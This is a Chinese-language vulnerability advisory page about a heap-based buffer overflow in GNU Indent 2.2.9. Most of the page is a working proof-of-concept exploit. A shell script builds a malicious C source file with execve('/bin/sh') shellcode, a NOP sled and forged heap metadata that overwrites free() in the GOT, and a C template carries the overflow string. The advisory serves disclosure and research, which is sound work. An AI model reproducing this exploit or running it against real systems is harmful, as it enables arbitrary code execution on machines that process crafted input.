发布日期：2003-12-26
更新日期：2003-12-31

受影响系统：

GNU Indent 2.2.9

描述：

---

BUGTRAQ  ID: 9297

GNU indent是一款码缩排工具，主要用于对使用C语言书写的代码进行格式化。

GNU indent在处理数据拷贝过程中缺少充分边界检查，本地攻击者可以利用这个漏洞进行基于堆的溢出，可能以indent进程权限在系统上执行任意指令。

此漏洞可以通过提供恶意C源输入文件来触发，由于indent从文件中拷贝数据到1000字节缓冲区时缺少充分边界检查，可覆盖堆栈中敏感信息，精心构建输入数据可能以indent进程权限在系统上执行任意指令。

<*来源：Winnie The Pooh Hacking Squadron
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Winnie The Pooh Hacking Squadron 提供了如下测试方法：

---------------------------prepare.sh----------------------------------
#!/bin/sh

# these addresses are working on indent 2.2.9 from
# slackware 9.0

# what_to_write
#
# it should be 2bytes aligned because it have to
# point to one of \xeb from jmps. If it points
# to \x08 - exploitation will fail
FD=`echo -e "\x40\xa4\x05\x08"`

# where_to_write-0x8
#
# it is good idea to point it to free() field in GOT
BK=`echo -e "\xc0\x7d\x05\x08"`

# change all 'JP' to \xeb\x08 (relative jmp to $+8 bytes)
sed -e "s/JP/`echo -e \"\xeb\x08\"`/g" winnie-template.c > temp.c

# change all 'N' to \x90 (NOP)
sed -e "s/NNNNNNNNNNNNNNN/`echo -e \"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\"`/" temp.c > winnie.c

# change 'S's to shellcode
sed -e "s/SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS/`echo -e \"\x31\xdb\x89\xd8\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x
89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff\/bin\/sh\"`/" winnie.c > temp.c

# exploit with this shellcode is quite useless, because
# it is simple execve(shell) shellcode. If you want to
# change shellcode, first prepare winnie-template.c -
# change 'SSSS...' len to len of your new shellcode,
# but len of whole 'JP...NNN...SSS' should remain the same.
# You can remove few 'JP's. You have to leave few NOPs
# before shellcode, because one of jmp's will land in them
# (this is to be sure that no jmp will land in the middle
# of shellcode. When you changed template, change sed line
# above - change 'SSSS...' len and shellcode.


# change 'dddd' 'eeee' 'ffff' to 0xfffffffc (-4)
sed -e "s/dddd/`echo -e \"\xfc\xff\xff\xff\"`/" temp.c > winnie.c
sed -e "s/eeee/`echo -e \"\xfc\xff\xff\xff\"`/" winnie.c > temp.c
sed -e "s/ffff/`echo -e \"\xfc\xff\xff\xff\"`/" temp.c > winnie.c

# change 'gggg' to FD (what_to_write)
sed -e "s/gggg/$FD/" winnie.c > temp.c

# change 'hhhh' to BK (where_to_write-8)
sed -e "s/hhhh/$BK/" temp.c > winnie.c

# 'iiii' is prev_size, but we don't need to change it
# Left it untouched

# change 'jjjj' to 0xfffffff1 (size field, pointing to these
# three (-4))
sed -e "s/jjjj/`echo -e \"\xf1\xff\xff\xff\"`/" winnie.c > temp.c

# change 'llll' to some readable value (on stack for example)
# it is 'next' field of overwritten buf_break_list struct
sed -e "s/llll/`echo -e \"\x40\xff\xff\xbf\"`/" temp.c > winnie.c

rm temp.c

--------------------------prepare.sh------------------------------

--------------------------winnie-template.c---------------------

nt main(int argc, char **argv)
{
    printf("W1nN13 Th3 p00H H4ck1n6 SqU4dr0n pR0udlY Pr3z3n7z:\n"
           "0-day P0f f0R indent-2.2.9 bUFF3r oV3rFl0W vU1n3r4b1l1ty\n");

  asm
        (
        "nop\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "jmp continue\n"
        ".string \"JPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJP
JPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJ
PJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJP
JPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJ
PJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJP
JPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPNNNNNNNNNNNNNNNSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS\"\n"
        ".string \"cccddddeeeeffffgggghhhhiiiijjjjkkkkllll\"\n"
        "continue:\n"
        "nop\n"
        "nop\n"
        :);
  return 0;
}

-------------------------------winnie-template.c------------------------------

建议：

---

厂商补丁：

GNU
---
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.gnu.org/software/indent/

浏览次数：3084
严重程度：0（网友投票）